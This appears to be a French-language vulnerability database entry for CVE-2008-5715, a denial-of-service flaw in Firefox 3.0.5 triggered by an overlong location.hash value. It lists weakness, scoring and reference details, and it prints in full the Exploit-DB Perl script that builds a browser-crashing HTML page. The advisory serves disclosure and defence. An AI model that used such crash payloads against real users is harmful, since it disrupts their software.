CVE-2008-5715 : Détail

CVE-2008-5715

A03-Injection
2.77%V3
Network
2008-12-24
16h00 +00:00
2018-10-11
17h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Mozilla Firefox 3.0.5 on Windows Vista allows remote attackers to cause a denial of service (application crash) via JavaScript code with a long string value for the hash property (aka location.hash). NOTE: it was later reported that earlier versions are also affected, and that the impact is CPU consumption and application hang in unspecified circumstances perhaps involving other platforms.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-20 Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 7554

Date de publication : 2008-12-22 23h00 +00:00
Auteur : Jeremy Brown
EDB Vérifié : Yes

#!/usr/bin/perl # mzff_lhash_dos.pl # Mozilla Firefox 3.0.5 location.hash Denial of Service Exploit # Jeremy Brown [[email protected]/jbrownsec.blogspot.com] # Crash on Vista, play with it on XP $filename = $ARGV[0]; if(!defined($filename)) { print "Usage: $0 <filename.html>\n\n"; } $head = "<html>" . "\n" . "<script type=\"text/javascript\">" . "\n"; $trig = "location.hash = \"" . "A" x 20000000 . "\";" . "\n"; $foot = "</script>" . "\n" . "</html>"; $data = $head . $trig . $foot; open(FILE, '>' . $filename); print FILE $data; close(FILE); exit; # milw0rm.com [2008-12-23]

Products Mentioned

Configuraton 0

Mozilla>>Firefox >> Version 3.0.5

Microsoft>>Windows_vista >> Version *

Références

http://securityreason.com/securityalert/4807
Tags : third-party-advisory, x_refsource_SREASON
http://websecurity.com.ua/3424/
Tags : x_refsource_MISC
http://www.securityfocus.com/bid/32988
Tags : vdb-entry, x_refsource_BID
http://osvdb.org/51032
Tags : vdb-entry, x_refsource_OSVDB
https://www.exploit-db.com/exploits/7554
Tags : exploit, x_refsource_EXPLOIT-DB